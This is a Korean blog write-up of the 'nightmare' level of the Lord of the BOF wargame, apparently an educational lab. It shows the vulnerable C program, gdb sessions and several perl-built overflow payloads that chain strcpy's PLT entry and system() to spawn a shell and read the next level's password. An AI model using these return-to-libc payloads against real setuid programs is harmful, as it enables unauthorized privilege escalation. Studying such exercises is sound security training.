방학이 지옥이여 뭐시여 왜나한테 이런 시련을 주는겨 왜 난 학원숙제를 안하고이쓰까나
[succubus@localhost succubus]$ ls
nightmare nightmare.c
[succubus@localhost succubus]$ cat nightmare.c
/*
The Lord of the BOF : The Fellowship of the BOF
- nightmare
- PLT
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>
main(int argc, char *argv[])
{
char buffer[40];
char *addr;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// check address
addr = (char *)&strcpy;
if(memcmp(argv[1]+44, &addr, 4) != 0){
printf("You must fall in love with strcpy()\n");
exit(0);
}//버퍼 후 ret가 strcpy여야 합니다 위에 주석의 힌트로 봐선 plt주소값을 사용하란뜻일듯여
// overflow!
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// dangerous waterfall
memset(buffer+40+8, 'A', 4);
}
[succubus@localhost succubus]$ cp nightmare fightmare
[succubus@localhost succubus]$ gdb -q fightmare
(gdb) b main
Breakpoint 1 at 0x80486ba
(gdb) r
Starting program: /home/succubus/fightmare
Breakpoint 1, 0x80486ba in main ()
(gdb) p strcpy
$1 = {char *(char *, char *)} 0x400767b0 <strcpy>
(gdb) disas main
Dump of assembler code for function main:
0x80486b4 <main>: push %ebp
0x80486b5 <main+1>: mov %esp,%ebp
0x80486b7 <main+3>: sub $0x2c,%esp
0x80486ba <main+6>: cmpl $0x1,0x8(%ebp)
0x80486be <main+10>: jg 0x80486d7 <main+35>
0x80486c0 <main+12>: push $0x80487db
0x80486c5 <main+17>: call 0x80483e0 <printf>
0x80486ca <main+22>: add $0x4,%esp
0x80486cd <main+25>: push $0x0
0x80486cf <main+27>: call 0x80483f0 <exit>
0x80486d4 <main+32>: add $0x4,%esp
0x80486d7 <main+35>: movl $0x8048410,0xffffffd4(%ebp)
0x80486de <main+42>: push $0x4
0x80486e0 <main+44>: lea 0xffffffd4(%ebp),%eax
0x80486e3 <main+47>: push %eax
0x80486e4 <main+48>: mov 0xc(%ebp),%eax
0x80486e7 <main+51>: add $0x4,%eax
0x80486ea <main+54>: mov (%eax),%edx
0x80486ec <main+56>: add $0x2c,%edx
0x80486ef <main+59>: push %edx
0x80486f0 <main+60>: call 0x80483c0 <memcmp>
0x80486f5 <main+65>: add $0xc,%esp
0x80486f8 <main+68>: mov %eax,%eax
0x80486fa <main+70>: test %eax,%eax
0x80486fc <main+72>: je 0x8048715 <main+97>
0x80486fe <main+74>: push $0x8048800
0x8048703 <main+79>: call 0x80483e0 <printf>
0x8048708 <main+84>: add $0x4,%esp
0x804870b <main+87>: push $0x0
0x804870d <main+89>: call 0x80483f0 <exit>
0x8048712 <main+94>: add $0x4,%esp
0x8048715 <main+97>: mov 0xc(%ebp),%eax
0x8048718 <main+100>: add $0x4,%eax
0x804871b <main+103>: mov (%eax),%edx
0x804871d <main+105>: push %edx
0x804871e <main+106>: lea 0xffffffd8(%ebp),%eax
---Type <return> to continue, or q <return> to quit---
0x8048721 <main+109>: push %eax
0x8048722 <main+110>: call 0x8048410 <strcpy> //걍 @plt안붙어있지만 이거인 쁼이 남여
0x8048727 <main+115>: add $0x8,%esp
0x804872a <main+118>: lea 0xffffffd8(%ebp),%eax
0x804872d <main+121>: push %eax
0x804872e <main+122>: push $0x8048825
0x8048733 <main+127>: call 0x80483e0 <printf>
0x8048738 <main+132>: add $0x8,%esp
0x804873b <main+135>: push $0x4
0x804873d <main+137>: push $0x41
0x804873f <main+139>: lea 0xffffffd8(%ebp),%eax
0x8048742 <main+142>: lea 0x30(%eax),%edx
0x8048745 <main+145>: push %edx
0x8048746 <main+146>: call 0x8048400 <memset>
0x804874b <main+151>: add $0xc,%esp
0x804874e <main+154>: leave
0x804874f <main+155>: ret
End of assembler dump.
(gdb) q
The program is running. Exit anyway? (y or n) y
[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08"'`
//시도해보니 됨. 올ㅋ
/*여기서 고민을 했는데 위의 프로그램은 strcpy실행 후 ret주소가 들어갈 자리를 A로 채워버립니다. 근데 왜 하필 strcpy일까염 쓰라고 그런거겠죠? 인자 리밋도 안하니 결국엔 strcpy를 사용해 ret가 들어갈 곳에 주소를 넣는거라고 생ㅇ각을 하게 됬습니다. 그래서 처음엔 strcpy인자두개 뒤에 시스템 주소와 /bin/sh주소 넣으려고 했는데 안되디다. 그래서 걍 앞에따가 넣었어요.*/
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q fightmare
(gdb) b main
Breakpoint 1 at 0x80486ba
(gdb) r
Starting program: /home/succubus/fightmare
Breakpoint 1, 0x80486ba in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) q
The program is running. Exit anyway? (y or n) y
/*중간에 뭔 뻘짓을 너무많이해놔서 안가리고 걍 다 지웠습니다....*/
[succubus@localhost succubus]$export BINSH=`perl -e 'print "/bin/sh"'`
bash2: export: command not found
[succubus@localhost succubus]$ export BINSH=`perl -e 'print "/bin/sh"'`
[succubus@localhost succubus]$ ls
core fightmare nightmare nightmare.c
[succubus@localhost succubus]$ vi foo.c
[succubus@localhost succubus]$ gcc foo.c -o foo
foo.c: In function `main':
foo.c:5: warning: assignment makes pointer from integer without a cast
[succubus@localhost succubus]$ ./foo BINSH
0xbffffc7c
[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\x90"x44, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xdc\xfa\xff\xbf", "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf" '`
AAAAúú ¿úú ¿@BBBB|ü ¿
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare AAAAúú ¿úú ¿@BBB'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) x/40wx $esp-80
0xbffffa74: 0xbffffb04 0xbffffab8 0x0804874b 0xbffffac0
0xbffffa84: 0x00000041 0x00000004 0x08048410 0x90909090
0xbffffa94: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaa4: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffab4: 0x90909090 0x4000ae60 0x90909090 0x41414141
0xbffffac4: 0xbffffad0 0xbffffadc 0x40058ae0 0x08048441
0xbffffad4: 0x080486b4 0x00000002 0x08048441 0x080486b4
0xbffffae4: 0x00000002 0xbffffb04 0x08048350 0x0804877c
0xbffffaf4: 0x4000ae60 0xbffffafc 0x40013e90 0x00000002
0xbffffb04: 0xbffffc02 0xbffffc0e 0x00000000 0xbffffc57
(gdb) x/wx 0xbffffa90
0xbffffa90: 0x90909090
(gdb) q
[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\x98\xfa\xff\xbf"'`
@BBBB|ü ¿AAAAúú ¿ú ¿
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ú ¿'.
Program terminated with signal 11, Segmentation fault.
#0 0x41410004 in ?? () //잘 안바뀜
(gdb) q
[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xac\xfa\xff\xbf"'`
@BBBB|ü ¿AAAAúú ¿¬ú ¿
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿¬ú ¿'.
Program terminated with signal 11, Segmentation fault.
#0 0x90909090 in ?? ()
(gdb) x/40wx 0xbffffaac
0xbffffaac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffabc: 0x90909090 0x90909090 0x90909090 0x4000ae60
0xbffffacc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffadc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaec: 0x0800ae60 0x080486b4 0x00000002 0xbffffb14
0xbffffafc: 0x08048350 0x0804877c 0x4000ae60 0xbffffb0c
0xbffffb0c: 0x40013e90 0x00000002 0xbffffc0e 0xbffffc1a
0xbffffb1c: 0x00000000 0xbffffc57 0xbffffc6a 0xbffffc78
0xbffffb2c: 0xbffffc90 0xbffffcaf 0xbffffcd1 0xbffffcdf
0xbffffb3c: 0xbffffea2 0xbffffec1 0xbffffedf 0xbffffef4
(gdb) x/40wx 0xbffffaa8
0xbffffaa8: 0xbffffc7c 0x90909090 0x90909090 0x90909090
0xbffffab8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac8: 0x4000ae60 0x90909090 0x90909090 0x90909090
0xbffffad8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae8: 0x90909090 0x0800ae60 0x080486b4 0x00000002
0xbffffaf8: 0xbffffb14 0x08048350 0x0804877c 0x4000ae60
0xbffffb08: 0xbffffb0c 0x40013e90 0x00000002 0xbffffc0e
0xbffffb18: 0xbffffc1a 0x00000000 0xbffffc57 0xbffffc6a
0xbffffb28: 0xbffffc78 0xbffffc90 0xbffffcaf 0xbffffcd1
0xbffffb38: 0xbffffcdf 0xbffffea2 0xbffffec1 0xbffffedf
(gdb) x/40wx 0xbffffaa0
0xbffffaa0: 0x40058ae0 0x42424242 0xbffffc7c 0x90909090
0xbffffab0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffac0: 0x90909090 0x90909090 0x4000ae60 0x90909090
0xbffffad0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffae0: 0x90909090 0x90909090 0x90909090 0x0800ae60
0xbffffaf0: 0x080486b4 0x00000002 0xbffffb14 0x08048350
0xbffffb00: 0x0804877c 0x4000ae60 0xbffffb0c 0x40013e90
0xbffffb10: 0x00000002 0xbffffc0e 0xbffffc1a 0x00000000
0xbffffb20: 0xbffffc57 0xbffffc6a 0xbffffc78 0xbffffc90
0xbffffb30: 0xbffffcaf 0xbffffcd1 0xbffffcdf 0xbffffea2
(gdb) q
[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x7c\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`
@BBBB|ü ¿AAAAúú ¿ ú ¿
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()/*뭐가 잘 안됨. 근데 걍 삘이 아 시스템 인자전달이 잘못되서 저게....라는 느낌이었슴다*/
(gdb) q
[succubus@localhost succubus]$ gdb -q -c core
Core was generated by `./fightmare @BBBB|ü ¿AAAAúú ¿ ú ¿'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()
(gdb) x/s 0xbffffc7c
0xbffffc7c: "TEHOST=192.168.10.1" /*foo.c너는 대체 나에게 무슨 주소를 준것이냐..*/
(gdb) x/5s 0xbffffc7c
0xbffffc7c: "TEHOST=192.168.10.1"
0xbffffc90: "HOSTNAME=localhost.localdomain"
0xbffffcaf: "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffcd1: "USER=succubus"
0xbffffcdf: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
(gdb) x/5s 0xbffffc70
0xbffffc70: "/bin/sh"
0xbffffc78: "REMOTEHOST=192.168.10.1"
0xbffffc90: "HOSTNAME=localhost.localdomain"
0xbffffcaf: "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffcd1: "USER=succubus"
(gdb) q
[succubus@localhost succubus]$ ./fightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`
@BBBBpü ¿AAAAúú ¿ ú ¿
bash$ exit
exit
Segmentation fault (core dumped)
[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40", "BBBB", "\x70\xfc\xff\xbf", "\x90"x32, "\x10\x84\x04\x08", "AAAA", "\xd0\xfa\xff\xbf", "\xa0\xfa\xff\xbf"'`
@BBBBpü ¿AAAAúú ¿ ú ¿
bash$ my-pass
euid = 518
굿굿
'STUDY > Lord of the BOF' 카테고리의 다른 글
| xavius->death_knight (0) | 2014.07.31 |
|---|---|
| nightmare->xavius (0) | 2014.07.22 |
| zombie_assassin->succubus (0) | 2014.07.08 |
| assassin->zombie_assassin (2) | 2014.06.26 |
| assassin->zombie_assassin (0) | 2014.05.13 |